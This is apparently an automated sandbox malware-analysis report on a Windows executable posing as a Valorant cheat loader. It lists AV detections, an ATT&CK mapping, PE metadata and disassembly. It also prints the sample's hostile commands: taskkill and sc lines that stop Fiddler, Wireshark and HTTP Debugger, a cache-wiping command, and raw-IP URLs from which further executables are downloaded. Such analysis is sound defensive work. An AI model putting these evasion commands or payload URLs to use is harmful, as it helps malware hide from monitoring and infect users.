Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A00894 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF602A00894
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029D5370 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,memcmp,closesocket,closesocket,closesocket,closesocket,0_2_00007FF6029D5370
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029E5300 calloc,strchr,strncpy,strchr,strncpy,strchr,strtoul,strchr,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,0_2_00007FF6029E5300
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C7F40 memset,strncmp,strncmp,strchr,htons,atoi,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,0_2_00007FF6029C7F40
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029EC060 calloc,calloc,calloc,bind,WSAGetLastError,0_2_00007FF6029EC060
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029EBE00 calloc,calloc,calloc,bind,WSAGetLastError,0_2_00007FF6029EBE00
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Windows Service
1
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
1
Exploitation of Remote Services
12
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
1
Virtualization/Sandbox Evasion
LSASS Memory21
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets3
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590901 Sample: PlusPrivStoreAtt116.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 56 33 keyauth.win 2->33 39 Multi AV Scanner detection for submitted file 2->39 41 Machine Learning detection for sample 2->41 43 AI detected suspicious sample 2->43 8 PlusPrivStoreAtt116.exe 1 2->8         started        signatures3 process4 dnsIp5 35 keyauth.win 104.26.1.5, 443, 49760 CLOUDFLARENETUS United States 8->35 37 127.0.0.1 unknown unknown 8->37 11 cmd.exe 1 8->11         started        13 cmd.exe 1 8->13         started        15 cmd.exe 1 8->15         started        17 16 other processes 8->17 process6 process7 19 taskkill.exe 1 11->19         started        21 taskkill.exe 1 13->21         started        23 taskkill.exe 1 15->23         started        25 taskkill.exe 1 17->25         started        27 taskkill.exe 1 17->27         started        29 taskkill.exe 1 17->29         started        31 9 other processes 17->31

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PlusPrivStoreAtt116.exe42%VirustotalBrowse
PlusPrivStoreAtt116.exe66%ReversingLabsWin64.Trojan.Lazy
PlusPrivStoreAtt116.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://167.114.85.75/plusattnewhvcionprivate.exe0%Avira URL Cloudsafe
http://167.114.85.75/plusattnewhvcionprivate.exeC:0%Avira URL Cloudsafe
https://keyauth.cc/panel/bronkzware/Loader0%Avira URL Cloudsafe
http://167.114.85.75/plushvcioffbronkzatualizadoh79.exeC:0%Avira URL Cloudsafe
http://167.114.85.75/plushvcioffbronkzatualizadoh79.exe0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
keyauth.win
104.26.1.5
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://keyauth.win/api/1.1/false
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://keyauth.win/api/1.2/:PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://167.114.85.75/plusattnewhvcionprivate.exePlusPrivStoreAtt116.exefalse
        • Avira URL Cloud: safe
        unknown
        http://167.114.85.75/plushvcioffbronkzatualizadoh79.exeC:PlusPrivStoreAtt116.exefalse
        • Avira URL Cloud: safe
        unknown
        http://167.114.85.75/plushvcioffbronkzatualizadoh79.exePlusPrivStoreAtt116.exefalse
        • Avira URL Cloud: safe
        unknown
        https://keyauth.win/api/1.1/acePlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://keyauth.win/api/1.1/umemPlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://167.114.85.75/plusattnewhvcionprivate.exeC:PlusPrivStoreAtt116.exefalse
            • Avira URL Cloud: safe
            unknown
            https://curl.haxx.se/docs/http-cookies.htmlPlusPrivStoreAtt116.exefalse
              high
              https://curl.haxx.se/docs/http-cookies.html#PlusPrivStoreAtt116.exefalse
                high
                https://keyauth.cc/panel/bronkzware/LoaderPlusPrivStoreAtt116.exe, 00000000.00000003.1395395872.00000259F16B1000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395284234.00000259F16B1000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395395872.00000259F16B5000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F1689000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F16B5000.00000004.00000020.00020000.00000000.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000003.1395284234.00000259F16B5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://keyauth.win/api/1.2/PlusPrivStoreAtt116.exe, 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmp, PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  104.26.1.5
                  keyauth.winUnited States
                  13335CLOUDFLARENETUSfalse
                  IP
                  127.0.0.1
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1590901
                  Start date and time:2025-01-14 16:44:26 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:40
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PlusPrivStoreAtt116.exe
                  Detection:MAL
                  Classification:mal56.winEXE@66/18@1/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 50
                  • Number of non-executed functions: 226
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  TimeTypeDescription
                  10:46:03API Interceptor214943x Sleep call for process: PlusPrivStoreAtt116.exe modified
                  10:47:18API Interceptor450x Sleep call for process: conhost.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.26.1.5CCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                    dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                          Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.Win64.Evo-gen.6030.29502.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.Trojan.Generic.36879400.484.7364.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Win64.MalwareX-gen.6639.30242.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win64.Evo-gen.24402.15705.exeGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Win64.MalwareX-gen.25010.24037.exeGet hashmaliciousUnknownBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      keyauth.winB06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      ak3o7AZ3mH.exeGet hashmaliciousBabadeda, Conti, MimikatzBrowse
                                      • 104.26.0.5
                                      Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      IJGLxMMTaK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      IJGLxMMTaK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.0.5
                                      CCuITQzvd4.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      dMFmJxq6oK.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 104.21.64.1
                                      0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                      • 172.65.251.78
                                      http://wagestream.acemlnb.comGet hashmaliciousUnknownBrowse
                                      • 104.20.0.15
                                      Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
                                      • 104.18.95.41
                                      Payment_243.jsGet hashmaliciousNetSupport RATBrowse
                                      • 172.67.68.212
                                      Payment_243.jsGet hashmaliciousNetSupport RATBrowse
                                      • 104.26.0.231
                                      http://vionicstore.shopGet hashmaliciousUnknownBrowse
                                      • 104.18.73.116
                                      http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                      • 172.67.197.240
                                      mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                      • 172.67.150.129
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 104.26.1.5
                                      Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
                                      • 104.26.1.5
                                      http://vionicstore.shopGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                      • 104.26.1.5
                                      TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.1.5
                                      No context
                                      Process:C:\Users\user\Desktop\PlusPrivStoreAtt116.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):304
                                      Entropy (8bit):3.644169459123466
                                      Encrypted:false
                                      SSDEEP:3:rRRqmIEaGj3F/9Dqa+U4W42oJXWWxbF2To3G3oJXWWxbFWXqowvxOwVGt:H041lxwhHawhwcV4
                                      MD5:DF552214087F20ACF423B1FA912CAF62
                                      SHA1:4CB23050703E757BFE05C0E4B28314D673B08693
                                      SHA-256:98F76FD5FEA096224BD97E3EA6A315E01A5218E57EE59ADD7DD8F691F4FCCA51
                                      SHA-512:07754C89FDDC1391628BFBC470B8B67ED73583EAACBA4F30E0F3F17FBCFCD148E06620E3698666CA2BA068F9FE0A2F913322DFF9C1B11B106FB89B779F9A777A
                                      Malicious:false
                                      Preview:....##########################################################..[ Selecione uma opcao: ]..##########################################################....[1] Iniciar Valorant Plus (HVCI DESLIGADO): ..[2] Iniciar Valorant Plus (HVCI HABILITADO): ....[+] Selecione a opcao:
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):44
                                      Entropy (8bit):4.003997527334849
                                      Encrypted:false
                                      SSDEEP:3:HnRthLK5a6eCMABe:HRoJPO
                                      MD5:DF5DC1ABC0D52F3C9E931E26A7C0065C
                                      SHA1:EE84123D3B3BC440C63DFE65FF5616BE2B0904D5
                                      SHA-256:F7167A2FACDE50428D8D2697A1CDFF075DE809323DD16D62B65CDD103B2A9A6D
                                      SHA-512:9B2253CE41880D22A2DDF4F886BB6CB22FF0C981400CD9D03A1FCA81DE5FAEB86C26B85B66ECEC960816D7BBE9740843890F2FCCD334B6D274295A32A8E6A4E9
                                      Malicious:false
                                      Preview:The system cannot find the file specified...
                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                      Entropy (8bit):6.420350102147237
                                      TrID:
                                      • Win64 Executable Console (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:PlusPrivStoreAtt116.exe
                                      File size:510'464 bytes
                                      MD5:d4a125241862eb0a4bd1afcf362d914f
                                      SHA1:c3c418450fe4cd0768e214a270374f6e1c8e37f3
                                      SHA256:29c141ee54b805226e0fe7eafe994ec3b461a648861497964acff28d35ba78b8
                                      SHA512:0e860929f32f69fd1bc89799fd84ac64b96516fed0123ab9c5a2afbef1e87de6c51f90b9cf0d5d1f6dd1726fc26e6118bc780a8bd43ea54a215689959bfa53f0
                                      SSDEEP:12288:GKYt4C6iIzrAjqDKE22zDzN5ofEwN/PXMk:Gt4C63zriea2zHNyEwpXMk
                                      TLSH:45B47D56A7A817E9D1A7C03CC547C603E7B6B4991311DBDB43A0CA792F237E26E3A710
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........V...V...V..._...B...PHe.^...PH..v...PH..\...PH..R...PH..P.......A...V...x.......?...9H..T...9H..W...9Hg.W...9H..W...RichV..
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x140060368
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows cui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x677DDEDD [Wed Jan 8 02:11:41 2025 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:551e5f19de2baa264d46ee5c6718793c
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007FAD411DA1F8h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007FAD411D9B47h
                                      int3
                                      int3
                                      jmp 00007FAD411DA4AEh
                                      int3
                                      int3
                                      int3
                                      inc eax
                                      push ebx
                                      dec eax
                                      sub esp, 20h
                                      dec eax
                                      mov ebx, ecx
                                      xor ecx, ecx
                                      call dword ptr [00001D9Bh]
                                      dec eax
                                      mov ecx, ebx
                                      call dword ptr [00001D8Ah]
                                      call dword ptr [00001DE4h]
                                      dec eax
                                      mov ecx, eax
                                      mov edx, C0000409h
                                      dec eax
                                      add esp, 20h
                                      pop ebx
                                      dec eax
                                      jmp dword ptr [00001DE0h]
                                      dec eax
                                      mov dword ptr [esp+08h], ecx
                                      dec eax
                                      sub esp, 38h
                                      mov ecx, 00000017h
                                      call dword ptr [00001DD4h]
                                      test eax, eax
                                      je 00007FAD411D9CD9h
                                      mov ecx, 00000002h
                                      int 29h
                                      dec eax
                                      lea ecx, dword ptr [00019492h]
                                      call 00007FAD411D9E9Eh
                                      dec eax
                                      mov eax, dword ptr [esp+38h]
                                      dec eax
                                      mov dword ptr [00019579h], eax
                                      dec eax
                                      lea eax, dword ptr [esp+38h]
                                      dec eax
                                      add eax, 08h
                                      dec eax
                                      mov dword ptr [00019509h], eax
                                      dec eax
                                      mov eax, dword ptr [00019562h]
                                      dec eax
                                      mov dword ptr [000193D3h], eax
                                      dec eax
                                      mov eax, dword ptr [esp+40h]
                                      dec eax
                                      mov dword ptr [000194D7h], eax
                                      mov dword ptr [000193ADh], C0000409h
                                      mov dword ptr [000193A7h], 00000001h
                                      mov dword ptr [000000B1h], 00000000h
                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x773180x1cc.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7f0000x1e8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x7a0000x405c.pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000x4ec.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x710900x70.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x711000x28.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x70f500x140.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x620000x858.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x606e80x60800f6be6f4c0ca7f222fea58e8729dc8f93False0.5324744980569949data6.334595345552807IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x620000x16ec40x170005baa9e49913892291fedbb67715bfaf7False0.379585597826087data5.59957998743783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x790000xe080x400cef7bcba2c4bb58f5386ec5b3ae9f7f8False0.2138671875data2.4461568678801138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata0x7a0000x405c0x42001f44589aeb34f25d94952a45d7939e4fFalse0.47407670454545453data5.699721075250355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x7f0000x1e80x2009682c2bd23621eded0bee00be928ba8fFalse0.54296875data4.772037401703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x800000x4ec0x600cac0ac8c6a84a9b40000852c8a3bff36False0.5149739583333334data4.845798537474806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_MANIFEST0x7f0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                      DLLImport
                                      KERNEL32.dllReadFile, PeekNamedPipe, WaitForMultipleObjects, CreateFileA, GetFileSizeEx, WideCharToMultiByte, RtlCaptureContext, GetModuleHandleA, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FreeLibrary, GetSystemDirectoryA, QueryPerformanceFrequency, VerSetConditionMask, SleepEx, GetEnvironmentVariableA, EnterCriticalSection, FormatMessageA, SetLastError, CloseHandle, GetCurrentProcess, DeleteCriticalSection, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, GetCurrentProcessId, GetCurrentThreadId, GetFileType, MultiByteToWideChar, WaitForSingleObjectEx, MoveFileExA, GetTickCount, QueryPerformanceCounter, VerifyVersionInfoA, LoadLibraryA, LeaveCriticalSection, GetSystemTimeAsFileTime, GetProcAddress, GetLastError, InitializeCriticalSectionEx, GetConsoleWindow, SetConsoleTitleA, SetConsoleTextAttribute, SetConsoleScreenBufferInfoEx, GetConsoleScreenBufferInfoEx, SetConsoleMode, GetConsoleMode, Sleep, RtlLookupFunctionEntry, GetStdHandle, OutputDebugStringW, InitializeSListHead
                                      USER32.dllMessageBoxA, MoveWindow, GetWindowRect, GetWindowLongA, SetWindowLongA
                                      ADVAPI32.dllCryptEncrypt, CryptAcquireContextA, CryptReleaseContext, CryptGetHashParam, CryptGenRandom, CryptCreateHash, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptImportKey
                                      SHELL32.dllShellExecuteA
